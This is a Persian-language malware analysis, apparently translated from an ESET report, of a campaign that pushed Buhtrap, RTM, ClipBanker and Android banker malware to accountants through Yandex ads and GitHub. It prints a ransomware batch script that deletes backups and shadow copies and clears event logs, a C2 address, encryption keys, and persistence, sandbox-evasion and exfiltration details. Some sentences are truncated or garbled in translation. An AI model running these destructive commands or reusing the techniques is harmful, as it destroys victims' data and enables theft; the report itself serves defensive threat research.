برای هدف قرار دادن حسابداران در یک حمله سایبری، می توانید از اسناد کاری که آنها به صورت آنلاین جستجو می کنند استفاده کنید. این تقریباً همان کاری است که یک گروه سایبری در چند ماه گذشته انجام داده است و درهای پشتی شناخته شده را توزیع می کند.
کد منبع Buhtrap در گذشته به صورت آنلاین به بیرون درز کرده است تا همه بتوانند از آن استفاده کنند. ما هیچ اطلاعاتی در مورد در دسترس بودن کد RTM نداریم.
در این پست به شما خواهیم گفت که چگونه مهاجمان بدافزار را با استفاده از Yandex.Direct توزیع کرده و آن را در GitHub میزبانی کردند. این پست با تجزیه و تحلیل فنی بدافزار به پایان می رسد.
Buhtrap و RTM به تجارت بازگشته اند
مکانیسم گسترش و قربانیان
محموله های مختلف تحویل داده شده به قربانیان یک مکانیسم انتشار مشترک دارند. تمام فایل های مخرب ایجاد شده توسط مهاجمان در دو مخزن مختلف GitHub قرار داده شده است.
به طور معمول، مخزن حاوی یک فایل مخرب قابل دانلود بود که اغلب تغییر می کرد. از آنجایی که GitHub به شما امکان می دهد تاریخچه تغییرات یک مخزن را مشاهده کنید، می توانیم ببینیم که چه بدافزاری در یک دوره خاص توزیع شده است. برای متقاعد کردن قربانی برای دانلود فایل مخرب، از وب سایت blanki-shabloni24[.]ru که در شکل بالا نشان داده شده است استفاده شد.
طراحی سایت و نام تمامی فایل های مخرب از یک مفهوم پیروی می کند - فرم ها، قالب ها، قراردادها، نمونه ها و غیره. استراتژی در کمپین جدید یکسان است. تنها سوال این است که قربانی چگونه به سایت مهاجمان رسیده است.
عفونت
حداقل چندین قربانی احتمالی که در این سایت قرار گرفتند توسط تبلیغات مخرب جذب شدند. در زیر یک URL نمونه است:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
همانطور که از لینک مشاهده می کنید، بنر در انجمن حسابداری قانونی bb.f2[.]kz قرار گرفته است. توجه به این نکته ضروری است که بنرها در سایت های مختلف ظاهر شده اند، همه دارای شناسه کمپین یکسان (blanki_rsya) بوده و بیشتر مربوط به خدمات حسابداری یا کمک حقوقی است. URL نشان می دهد که قربانی بالقوه از درخواست "دانلود فرم فاکتور" استفاده کرده است، که از فرضیه ما در مورد حملات هدفمند پشتیبانی می کند. در زیر سایت هایی که بنرها ظاهر شده اند و عبارت های جستجوی مربوطه هستند.
- دانلود فرم فاکتور – bb.f2[.]kz
- نمونه قرارداد - Ipopen[.]ru
- نمونه شکایت برنامه - 77metrov[.]ru
- فرم توافق نامه - blank-dogovor-kupli-prodazhi[.]ru
- نمونه دادخواست دادگاه - zen.yandex[.]ru
- نمونه شکایت - yurday[.]ru
- نمونه فرم های قرارداد - Regforum[.]ru
- فرم قرارداد – assistentus[.]ru
- نمونه قرارداد آپارتمان – napravah[.]com
- نمونه قراردادهای حقوقی - avito[.]ru
سایت blanki-shabloni24[.]ru ممکن است برای گذراندن یک ارزیابی بصری ساده پیکربندی شده باشد. به طور معمول، تبلیغی که به سایتی با ظاهر حرفه ای با پیوند به GitHub اشاره می کند، بدیهی به نظر نمی رسد. علاوه بر این، مهاجمان فایلهای مخرب را فقط برای مدت محدودی در مخزن آپلود کردند، احتمالاً در طول کمپین. در بیشتر مواقع، مخزن GitHub حاوی یک آرشیو زیپ خالی یا یک فایل EXE خالی بود. بنابراین، مهاجمان میتوانند تبلیغات را از طریق Yandex.Direct در سایتهایی که به احتمال زیاد توسط حسابدارانی که در پاسخ به سؤالات جستجوی خاص از آنها بازدید کردهاند، توزیع کنند.
در مرحله بعد، بیایید به بارهای مختلف توزیع شده به این روش نگاه کنیم.
تجزیه و تحلیل بار
گاهشماری توزیع
این کمپین مخرب در پایان اکتبر 2018 آغاز شد و در زمان نگارش این مقاله فعال است. از آنجایی که کل مخزن به صورت عمومی در GitHub در دسترس بود، ما یک جدول زمانی دقیق از توزیع شش خانواده مختلف بدافزار گردآوری کردیم (شکل زیر را ببینید). برای مقایسه با تاریخچه git، خطی اضافه کردهایم که نشان میدهد پیوند بنر چه زمانی کشف شد، همانطور که توسط تلهمتری ESET اندازهگیری شد. همانطور که می بینید، این به خوبی با در دسترس بودن بار در GitHub ارتباط دارد. اختلاف در پایان فوریه را می توان با این واقعیت توضیح داد که ما بخشی از تاریخچه تغییرات را نداشتیم زیرا قبل از اینکه بتوانیم آن را به طور کامل دریافت کنیم، مخزن از GitHub حذف شد.
شکل 1. کرونولوژی توزیع بدافزار.
گواهی امضای کد
این کمپین از چندین گواهی استفاده کرد. برخی از آنها توسط بیش از یک خانواده بدافزار امضا شده اند، که بیشتر نشان می دهد که نمونه های مختلف به یک کمپین تعلق دارند. با وجود در دسترس بودن کلید خصوصی، اپراتورها به طور سیستماتیک باینری ها را امضا نکردند و از کلید برای همه نمونه ها استفاده نکردند. در اواخر فوریه 2019، مهاجمان با استفاده از گواهی متعلق به گوگل که کلید خصوصی آن را نداشتند، شروع به ایجاد امضاهای نامعتبر کردند.
تمام گواهیهای دخیل در کمپین و خانوادههای بدافزارهایی که امضا میکنند در جدول زیر فهرست شدهاند.
ما همچنین از این گواهیهای امضای کد برای ایجاد پیوند با سایر خانوادههای بدافزار استفاده کردهایم. برای اکثر گواهیها، نمونههایی را پیدا نکردیم که از طریق مخزن GitHub توزیع نشده باشند. با این حال، گواهی TOV "MARIYA" برای امضای بدافزار متعلق به بات نت استفاده شد
Win32/Filecoder.Buhtrap
اولین مؤلفه ای که توجه ما را جلب کرد Win32/Filecoder.Buhtrap تازه کشف شده بود. این یک فایل باینری دلفی است که گاهی اوقات بسته بندی می شود. عمدتاً در فوریه تا مارس 2019 توزیع شد. همانطور که شایسته یک برنامه باج افزار است رفتار می کند - درایوهای محلی و پوشه های شبکه را جستجو می کند و فایل های شناسایی شده را رمزگذاری می کند. برای به خطر افتادن نیازی به اتصال اینترنت ندارد زیرا برای ارسال کلیدهای رمزگذاری با سرور تماس نمی گیرد. در عوض، یک «توکن» به انتهای پیام باج اضافه میکند و پیشنهاد میکند از ایمیل یا Bitmessage برای تماس با اپراتورها استفاده کنید.
برای رمزگذاری هرچه بیشتر منابع حساس، Filecoder.Buhtrap رشتهای را اجرا میکند که برای خاموش کردن نرمافزار کلیدی طراحی شده است که ممکن است دارای کنترلکنندههای فایل باز حاوی اطلاعات ارزشمندی باشد که میتواند در رمزگذاری اختلال ایجاد کند. فرآیندهای هدف عمدتاً سیستم های مدیریت پایگاه داده (DBMS) هستند. علاوه بر این، Filecoder.Buhtrap فایل های گزارش و پشتیبان گیری را حذف می کند تا بازیابی اطلاعات را دشوار کند. برای انجام این کار، اسکریپت دسته ای زیر را اجرا کنید.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap از یک سرویس آنلاین IP Logger استفاده می کند که برای جمع آوری اطلاعات در مورد بازدیدکنندگان وب سایت طراحی شده است. این هدف برای ردیابی قربانیان باج افزار است که مسئولیت آن بر عهده خط فرمان است:
mshta.exe "javascript:document.write('');"
فایلهای برای رمزگذاری در صورتی انتخاب میشوند که با سه فهرست حذف مطابقت نداشته باشند. اولاً، فایلهای با پسوندهای زیر رمزگذاری نمیشوند: .com، .cmd، .cpl، .dll، .exe، .hta، .lnk، .msc، .msi، .msp، .pif، .scr، .sys و خفاش. ثانیاً، تمام فایلهایی که مسیر کامل آنها شامل رشتههای دایرکتوری از لیست زیر است، حذف میشوند.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
سوم، نام فایل های خاصی نیز از رمزگذاری مستثنی می شوند، از جمله نام فایل پیام باج. لیست در زیر ارائه شده است. بدیهی است که تمام این استثنائات برای کارکردن دستگاه در نظر گرفته شده است، اما با حداقل قابلیت فنی.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
طرح رمزگذاری فایل
پس از اجرا، بدافزار یک جفت کلید RSA 512 بیتی تولید می کند. نماگر خصوصی (d) و مدول (n) سپس با یک کلید عمومی 2048 بیتی رمزگذاری شده (نمای عمومی و مدول)، zlib-packed و base64 رمزگذاری می شوند. کد مسئول این امر در شکل 2 نشان داده شده است.
شکل 2. نتیجه کامپایل کردن Hex-Rays فرآیند تولید جفت کلید RSA 512 بیتی.
در زیر نمونه ای از متن ساده با یک کلید خصوصی تولید شده است، که یک رمز متصل به پیام باج است.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
کلید عمومی مهاجمان در زیر آورده شده است.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
فایل ها با استفاده از AES-128-CBC با یک کلید 256 بیتی رمزگذاری می شوند. برای هر فایل رمزگذاری شده، یک کلید جدید و یک بردار اولیه جدید تولید می شود. اطلاعات کلیدی به انتهای فایل رمزگذاری شده اضافه می شود. بیایید فرمت فایل رمزگذاری شده را در نظر بگیریم.
فایل های رمزگذاری شده دارای هدر زیر هستند:
داده های فایل منبع با افزودن مقدار جادویی VEGA به 0x5000 بایت اول رمزگذاری می شود. تمام اطلاعات رمزگشایی به فایلی با ساختار زیر پیوست می شود:
- نشانگر اندازه فایل حاوی علامتی است که نشان می دهد اندازه فایل از 0x5000 بایت بیشتر است یا خیر.
- حباب کلید AES = ZlibCompress (RSAEncrypt (کلید AES + IV، کلید عمومی جفت کلید RSA تولید شده))
- حباب کلید RSA = ZlibCompress (RSAEncrypt (کلید خصوصی RSA تولید شده، کلید عمومی RSA با کد سخت))
Win32/ClipBanker
Win32/ClipBanker مؤلفهای است که از اواخر اکتبر تا اوایل دسامبر 2018 به طور متناوب توزیع شده است. نقش آن نظارت بر محتویات کلیپ بورد است، به دنبال آدرس کیف پول های ارزهای دیجیتال می گردد. پس از تعیین آدرس کیف پول هدف، ClipBanker آن را با آدرسی که گمان می رود متعلق به اپراتورها باشد جایگزین می کند. نمونه هایی که ما بررسی کردیم نه جعبه ای بودند و نه مبهم. تنها مکانیزم مورد استفاده برای پنهان کردن رفتار رمزگذاری رشته است. آدرس های کیف پول اپراتور با استفاده از RC4 رمزگذاری می شوند. ارزهای دیجیتال هدف بیت کوین، بیت کوین کش، دوج کوین، اتریوم و ریپل هستند.
در طول دوره انتشار بدافزار به کیف پول های بیت کوین مهاجمان، مقدار کمی به VTS ارسال شد که موفقیت کمپین را زیر سوال می برد. علاوه بر این، هیچ مدرکی وجود ندارد که نشان دهد این تراکنش ها اصلاً با ClipBanker مرتبط بوده اند.
Win32/RTM
مؤلفه Win32/RTM برای چند روز در اوایل مارس 2019 توزیع شد. RTM یک بانکدار تروجان است که در دلفی نوشته شده است و هدف آن سیستم های بانکداری از راه دور است. در سال 2017، محققان ESET منتشر کردند
Buhtrap Loader
برای مدتی، یک دانلودر در GitHub در دسترس بود که شبیه ابزارهای قبلی Buhtrap نبود. رو می کند به https://94.100.18[.]67/RSS.php?<some_id>
برای رسیدن به مرحله بعدی و بارگذاری مستقیم آن در حافظه. ما می توانیم دو رفتار کد مرحله دوم را تشخیص دهیم. در اولین URL، RSS.php به طور مستقیم از درپشتی Buhtrap عبور کرد - این درب پشتی بسیار شبیه به درب پشتی موجود پس از فاش شدن کد منبع است.
جالب اینجاست که ما شاهد چندین کمپین با درب پشتی Buhtrap هستیم و ظاهراً توسط اپراتورهای مختلف اداره می شوند. در این مورد، تفاوت اصلی این است که درب پشتی مستقیماً در حافظه بارگذاری می شود و از طرح معمول با فرآیند استقرار DLL که در مورد آن صحبت کردیم استفاده نمی کند.
دومین رفتار پیچیده تر این بود که URL RSS.php به لودر دیگری ارسال شد. برخی مبهمسازیها را اجرا کرد، مانند بازسازی جدول واردات پویا. هدف بوت لودر تماس با سرور C&C است
Android/Spy.Banker
جالب اینجاست که یک جزء برای اندروید نیز در مخزن GitHub یافت شد. او فقط یک روز در شعبه اصلی بود - 1 نوامبر 2018. به غیر از پست شدن در GitHub، تله متری ESET هیچ مدرکی دال بر توزیع این بدافزار پیدا نمی کند.
این مؤلفه به عنوان یک بسته برنامه Android (APK) میزبانی شد. به شدت مبهم است. رفتار مخرب در یک JAR رمزگذاری شده در APK پنهان می شود. با استفاده از این کلید با RC4 رمزگذاری می شود:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
از همان کلید و الگوریتم برای رمزگذاری رشته ها استفاده می شود. JAR در واقع شده است APK_ROOT + image/files
. 4 بایت اول فایل حاوی طول JAR رمزگذاری شده است که بلافاصله پس از فیلد طول شروع می شود.
پس از رمزگشایی فایل، متوجه شدیم که آنوبیس بوده است - قبلا
- ضبط میکروفون
- گرفتن اسکرین شات
- دریافت مختصات GPS
- کی لاگر
- رمزگذاری داده های دستگاه و تقاضای باج
- ارسال هرزنامه
جالب اینجاست که این بانکدار از توییتر به عنوان یک کانال ارتباطی پشتیبان برای به دست آوردن یک سرور C&C دیگر استفاده کرد. نمونه ای که ما تجزیه و تحلیل کردیم از حساب @JonesTrader استفاده می کرد، اما در زمان تجزیه و تحلیل از قبل مسدود شده بود.
بانکدار حاوی لیستی از برنامه های هدف در دستگاه اندروید است. این بیشتر از لیست به دست آمده در مطالعه Sophos است. این لیست شامل بسیاری از برنامه های بانکی، برنامه های خرید آنلاین مانند آمازون و eBay و خدمات ارزهای دیجیتال است.
MSIL/ClipBanker.IH
آخرین مؤلفه ای که به عنوان بخشی از این کمپین توزیع شد، فایل اجرایی دات نت ویندوز بود که در مارس 2019 ظاهر شد. اکثر نسخه های مورد مطالعه با ConfuserEx v1.0.0 بسته بندی شده بودند. مانند ClipBanker، این کامپوننت از کلیپ بورد استفاده می کند. هدف او طیف گسترده ای از ارزهای دیجیتال و همچنین پیشنهادات در Steam است. علاوه بر این، او از سرویس IP Logger برای سرقت کلید WIF خصوصی بیت کوین استفاده می کند.
مکانیسم های حفاظتی
علاوه بر مزایایی که ConfuserEx در جلوگیری از اشکال زدایی، تخلیه و دستکاری ارائه می دهد، این مؤلفه شامل توانایی شناسایی محصولات آنتی ویروس و ماشین های مجازی است.
برای تأیید اینکه در یک ماشین مجازی اجرا می شود، بدافزار از خط فرمان WMI داخلی ویندوز (WMIC) برای درخواست اطلاعات بایوس استفاده می کند، یعنی:
wmic bios
سپس برنامه خروجی فرمان را تجزیه می کند و به دنبال کلمات کلیدی می گردد: VBOX، VirtualBox، XEN، qemu، bochs، VM.
برای شناسایی محصولات آنتی ویروس، بدافزار یک درخواست ابزار مدیریت ویندوز (WMI) را با استفاده از Windows Security Center ارسال می کند ManagementObjectSearcher
API همانطور که در زیر نشان داده شده است. پس از رمزگشایی از base64، تماس به صورت زیر است:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
شکل 3. فرآیند شناسایی محصولات آنتی ویروس.
علاوه بر این، بدافزار بررسی می کند که آیا
ماندگاری
نسخه بدافزاری که ما مطالعه کردیم خودش را در آن کپی می کند %APPDATA%googleupdater.exe
و صفت "مخفی" را برای دایرکتوری گوگل تنظیم می کند. سپس او مقدار را تغییر می دهد SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell
در رجیستری ویندوز قرار می گیرد و مسیر را اضافه می کند updater.exe
. به این ترتیب هر بار که کاربر وارد سیستم می شود، بدافزار اجرا می شود.
رفتار بدخواهانه
مانند ClipBanker، این بدافزار محتویات کلیپ بورد را رصد می کند و به دنبال آدرس های کیف پول ارزهای دیجیتال می گردد و زمانی که پیدا شد، آن را با یکی از آدرس های اپراتور جایگزین می کند. در زیر لیستی از آدرس های هدف بر اساس آنچه در کد یافت می شود، آمده است.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
برای هر نوع آدرس یک عبارت منظم مربوطه وجود دارد. مقدار STEAM_URL برای حمله به سیستم Steam استفاده می شود، همانطور که از عبارت منظمی که برای تعریف در بافر استفاده می شود مشاهده می شود:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
کانال اکسفیلتراسیون
این بدافزار علاوه بر جایگزینی آدرسها در بافر، کلیدهای WIF خصوصی کیف پولهای بیتکوین، بیتکوین کور و الکتروم بیتکوین را هدف قرار میدهد. این برنامه از plogger.org به عنوان یک کانال خروجی برای به دست آوردن کلید خصوصی WIF استفاده می کند. برای انجام این کار، اپراتورها داده های کلید خصوصی را به سربرگ User-Agent HTTP اضافه می کنند، همانطور که در زیر نشان داده شده است.
شکل 4. کنسول IP Logger با داده های خروجی.
اپراتورها از iplogger.org برای استخراج کیف پول استفاده نکردند. آنها احتمالاً به دلیل محدودیت 255 کاراکتری در این زمینه، به روش دیگری متوسل شدند User-Agent
در رابط وب IP Logger نمایش داده می شود. در نمونه هایی که مطالعه کردیم، سرور خروجی دیگر در متغیر محیطی ذخیره شد DiscordWebHook
. با کمال تعجب، این متغیر محیطی در هیچ کجای کد اختصاص داده نشده است. این نشان می دهد که بدافزار هنوز در حال توسعه است و متغیر به دستگاه تست اپراتور اختصاص داده شده است.
نشانه دیگری وجود دارد که برنامه در حال توسعه است. فایل باینری شامل دو نشانی اینترنتی iplogger.org است و هر دو هنگام استخراج داده ها مورد پرسش قرار می گیرند. در یک درخواست به یکی از این URL ها، مقدار موجود در قسمت Referer قبل از "DEV /" قرار می گیرد. ما همچنین نسخه ای را پیدا کردیم که با استفاده از ConfuserEx بسته بندی نشده بود، گیرنده این URL DevFeedbackUrl نام دارد. بر اساس نام متغیر محیطی، ما معتقدیم که اپراتورها قصد دارند از سرویس قانونی Discord و سیستم رهگیری وب آن برای سرقت کیف پولهای ارزهای دیجیتال استفاده کنند.
نتیجه
این کمپین نمونه ای از استفاده از خدمات تبلیغاتی قانونی در حملات سایبری است. این طرح سازمانهای روسی را هدف قرار میدهد، اما اگر شاهد چنین حملهای با استفاده از خدمات غیرروسی باشیم، تعجب نخواهیم کرد. برای جلوگیری از سازش، کاربران باید از اعتبار منبع نرم افزاری که دانلود می کنند مطمئن باشند.
فهرست کاملی از شاخصهای سازش و ویژگیهای MITER ATT&CK در اینجا موجود است
منبع: www.habr.com